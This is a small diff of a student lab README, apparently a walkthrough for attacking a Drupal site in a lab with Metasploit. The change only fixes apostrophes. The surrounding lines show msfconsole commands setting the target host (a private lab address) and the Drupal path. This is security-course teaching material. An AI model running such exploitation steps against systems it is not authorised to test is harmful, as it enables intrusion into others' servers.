Berkanktk/SE05-CS/Lab05-Drupal/Readme.md

 ````

-Now lets set the options.
-RPORT, LHOST and LPORT looks fine as they are by default, so they wont be touched.
+Now let's set the options.
+RPORT, LHOST and LPORT looks fine as they are by default, so they won't be touched.
 ```console
 msf > set RHOST 10.0.2.4
 msf > set TARGETURI /drupal/